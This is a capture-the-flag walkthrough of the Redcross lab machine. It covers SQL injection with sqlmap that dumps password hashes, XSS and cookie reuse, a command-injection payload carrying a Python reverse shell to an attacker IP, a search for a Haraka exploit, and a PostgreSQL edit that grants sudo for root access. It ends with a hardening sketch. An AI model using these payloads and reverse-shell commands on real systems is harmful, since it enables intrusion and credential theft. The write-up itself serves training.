Redcross

Enumeration

export ip=10.10.10.113
ping $ip # TTL 63
nmap -p- -sC -sV $ip
Port  Service   Notes
22    ssh       OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
80    http      Apache httpd 2.4.25
443   ssl/http  Apache httpd 2.4.25 (Debian)

HTTP

Opening the IP in a browser redirects to redcross.htb, so it’s necessary to add this name to the hosts configuration (dnsmasq on my rig):

echo "address=/redcross.htb/10.10.10.113" | sudo tee /etc/NetworkManager/dnsmasq.d/domains.conf
sudo systemctl restart NetworkManager

The SSL certificate is only valid for intra (intra.redcross.htb) and contains the email penelope@redcross.htb. Trying some fuzzing:

dirsearch -f -u https://intra.redcross.htb/ -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -e php
# this finds documentation directory. Checking for some interesting files
dirsearch -f -u https://intra.redcross.htb/documentation/ -w /usr/share/seclists/Discovery/Web-Content/combined_directories.txt -e md pdf html
# found /documentation/account-signup.pdf
# checking for more subdomains running
wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u https://10.10.10.113 -H "Host: FUZZ.redcross.htb" --hw 28 --hc 400
# intra, admin

The file https://intra.redcross.htb/documentation/account-signup.pdf contains a message:

Intranet access request:

Please send a message using our intranet contact form: https://intra.redcross.htb/?page=contact

It’s very important that the subject of the message specifies that you are requesting “credentials” and also specify a username in the body of the message in the form:

“username=yourdesiredname”

It’s very important to follow these rules to get the account information as fast as possible, otherwise the message will be sent to our IT administrator who will take care of it when possible

Following these instructions gives a message that the request is being processed, and returns the credentials guest:guest.

Logging in and inspecting the page shows a message system. Testing an SQL injection payload in the filter parameter causes an SQL error (https://intra.redcross.htb/?o=%27+or+1%3D1+--&page=app).

Capturing the request with Burp Suite, then testing with sqlmap:

sqlmap -r sqli --delay=1
sqlmap -r sqli --delay=1 --dbs
# information_schema, redcross
sqlmap -r sqli --delay=1 -D redcross --tables
# messages, requests, users
sqlmap -r sqli --delay=1 -D redcross -T users --columns
# password, role, id, mail, username
sqlmap -r sqli --delay=1 -D redcross -T users --dump
id  mail                          role  username  password
1   admin@redcross.htb            0     admin     $2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq.
2   penelope@redcross.htb         1     penelope  $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS
3   charles@redcross.htb          1     charles   $2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i
4   tricia.wanderloo@contoso.com  100   tricia    $2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r.
5   non@available                 1000  guest     $2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi

admin.redcross.htb

On this site the guest login does work, but lands in a restricted session.

However, copying the session (jsession) cookie from intra into this site opens up the dashboard.

The add virtual user dialogue is vulnerable to XSS (<script>alert(1)</script>).

Adding a user generates a password: asd : 8bIo0fNH

The site also allows whitelisting IPs. Adding the attacker’s IP here may open up further services or pages.

More nmap

Scanning with nmap again now shows more ports are open:

nmap -sC -sV $ip -p-
Port  Service     Notes
21    ftp         vsftpd 2.0.8 or later
1025  NFS-or-IIS?
5432  postgresql  PostgreSQL DB 9.6.7 - 9.6.12

SSH

The user created in the admin panel works for logging in over SSH:

ssh asd@$ip # 8bIo0fNH

This system may be a sub-container without a complete rootfs. There is a file at /home/public/src/iptctl.c which contains the iptables code behind the admin.redcross.htb page:

iptctl.c
/*
 * Small utility to manage iptables, easily executable from admin.redcross.htb
 * v0.1 - allow and restrict mode
 * v0.3 - added check method and interactive mode (still testing!)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <unistd.h>
#define BUFFSIZE 360

int isValidIpAddress(char *ipAddress)
{
	struct sockaddr_in sa;
	int result = inet_pton(AF_INET, ipAddress, &(sa.sin_addr));
	return result != 0;
}

int isValidAction(char *action){
	int a=0;
	char value[10];
	strncpy(value,action,9);
	if(strstr(value,"allow")) a=1;
	if(strstr(value,"restrict")) a=2;
	if(strstr(value,"show")) a=3;
	return a;
}

void cmdAR(char **a, char *action, char *ip){
	a[0]="/sbin/iptables";
	a[1]=action;
	a[2]="INPUT";
	a[3]="-p";
	a[4]="all";
	a[5]="-s";
	a[6]=ip;
	a[7]="-j";
	a[8]="ACCEPT";
	a[9]=NULL;
	return;
}

void cmdShow(char **a){
	a[0]="/sbin/iptables" ;
	a[1]="-L";
	a[2]="INPUT";
	return;
}

void interactive(char *ip, char *action, char *name){
	char inputAddress[16];
	char inputAction[10];
	printf("Entering interactive mode\n");
	printf("Action(allow|restrict|show): ");
	fgets(inputAction,BUFFSIZE,stdin);
	fflush(stdin);
	printf("IP address: ");
	fgets(inputAddress,BUFFSIZE,stdin);
	fflush(stdin);
	inputAddress[strlen(inputAddress)-1] = 0;
	if(! isValidAction(inputAction) || ! isValidIpAddress(inputAddress)){
		printf("Usage: %s allow|restrict|show IP\n", name);
		exit(0);
	}
	strcpy(ip, inputAddress);
	strcpy(action, inputAction);
	return;
}

int main(int argc, char *argv[]){
	int isAction=0;
	int isIPAddr=0;
	pid_t child_pid;
	char inputAction[10];
	char inputAddress[16];
	char *args[10];
	char buffer[200];

	if(argc!=3 && argc!=2){
		printf("Usage: %s allow|restrict|show IP_ADDR\n", argv[0]);
		exit(0);
	}
	if(argc==2){
		if(strstr(argv[1],"-i")) interactive(inputAddress, inputAction, argv[0]);
	}
	else{
		strcpy(inputAction, argv[1]);
		strcpy(inputAddress, argv[2]);
	}
	isAction=isValidAction(inputAction);
	isIPAddr=isValidIpAddress(inputAddress);
	if(!isAction || !isIPAddr){
		printf("Usage: %s allow|restrict|show IP\n", argv[0]);
		exit(0);
	}
	puts("DEBUG: All checks passed... Executing iptables");
	if(isAction==1) cmdAR(args,"-A",inputAddress);
	if(isAction==2) cmdAR(args,"-D",inputAddress);
	if(isAction==3) cmdShow(args);
	
	child_pid=fork();
	if(child_pid==0){
		setuid(0);
		execvp(args[0],args);
		exit(0);
	}
	else{
		if(isAction==1) printf("Network access granted to %s\n",inputAddress);
		if(isAction==2) printf("Network access restricted to %s\n",inputAddress);
		if(isAction==3) puts("ERR: Function not available!\n");
	}
}

This program passes the user-supplied action and IP into cmdAR to build the iptables command. The admin portal in front of it turns out to be exploitable: adding extra shell syntax to the IP field of the whitelist form gets executed. For example, the payload

ip=1.2.3.4;whoami&action=deny

returns www-data, so the command runs as the web server user.

ip=1.2.3.4;python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("10.10.14.11",4444))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&action=deny

returns a reverse shell to a listener on port 4444. Listener and shell stabilisation:

nc -lvnp 4444
# shell stabilisation
python3 -c 'import pty; pty.spawn("/bin/bash")'
# (inside the nc session) CTRL+Z;
stty -a # note rows/columns of the local terminal
stty raw -echo; fg;
ls; export SHELL=/bin/bash; export TERM=screen; stty rows 32 columns 100; reset;
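As an added hardening sketch (my own code, not the box’s iptctl.c or its web wrapper): the action is exact-matched instead of strstr’d, the IP is round-tripped through inet_pton/inet_ntop so only a canonical dotted quad passes, and the result is an argv vector for execv(), so a value like 1.2.3.4;whoami is rejected rather than ever reaching a shell. Function names parse_action, is_valid_ipv4 and build_argv are mine.

```c
/* Added hardening sketch for an iptctl-style wrapper (not the box's code).
 * No user value is concatenated into a shell line; inputs are validated and
 * placed into an argv vector that would be handed straight to execv(). */
#include <string.h>
#include <arpa/inet.h>

enum { ACT_NONE = 0, ACT_ALLOW = 1, ACT_RESTRICT = 2, ACT_SHOW = 3 };

/* Exact match only: strstr() would accept "allow;whoami" or "disallow". */
int parse_action(const char *action)
{
	if (strcmp(action, "allow") == 0)    return ACT_ALLOW;
	if (strcmp(action, "restrict") == 0) return ACT_RESTRICT;
	if (strcmp(action, "show") == 0)     return ACT_SHOW;
	return ACT_NONE;
}

/* inet_pton() already rejects trailing text such as "1.2.3.4;whoami";
 * the inet_ntop() round trip additionally pins the input to canonical form. */
int is_valid_ipv4(const char *ip)
{
	struct in_addr addr;
	char canon[INET_ADDRSTRLEN];
	if (inet_pton(AF_INET, ip, &addr) != 1) return 0;
	if (inet_ntop(AF_INET, &addr, canon, sizeof canon) == NULL) return 0;
	return strcmp(canon, ip) == 0;
}

/* Fill argv for execv(); returns the entry count or -1 if input is rejected.
 * argv must have room for 10 pointers, like args[10] in iptctl.c. */
int build_argv(const char *action, const char *ip, const char **argv)
{
	int act = parse_action(action);
	if (act == ACT_NONE) return -1;
	argv[0] = "/sbin/iptables";
	if (act == ACT_SHOW) {
		argv[1] = "-L"; argv[2] = "INPUT"; argv[3] = NULL;
		return 3;
	}
	if (!is_valid_ipv4(ip)) return -1;
	argv[1] = (act == ACT_ALLOW) ? "-A" : "-D";
	argv[2] = "INPUT"; argv[3] = "-p"; argv[4] = "all";
	argv[5] = "-s"; argv[6] = ip; argv[7] = "-j"; argv[8] = "ACCEPT";
	argv[9] = NULL;
	return 9;
}
```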

Port 1025

Connecting to port 1025 now works from inside this reverse shell:

telnet 127.0.0.1 1025

The banner identifies the service as Haraka 2.8.8. Checking searchsploit:

searchsploit haraka # Haraka < 2.8.9 - Remote Command Execution
searchsploit -m 41162.py

PostgreSQL

Checking the web folder, credentials can be found for the database:

cd /var/www/html
grep -R Password

This finds unixusrmgr:dheu%7wjx8B&. Using this to log in to PostgreSQL:

psql -h 127.0.0.1 -U unixusrmgr unix
# check passwd_table
select * from passwd_table;
# Add sudo privileges (gid 27 = sudo group)
update passwd_table set gid=27 where uid=2022;

Now when SSHing in, the user doesn’t land in the jail and has sudo access:

ssh asd@$ip # 8bIo0fNH
id
sudo su
cat /root/root.txt
cat /home/penelope/user.txt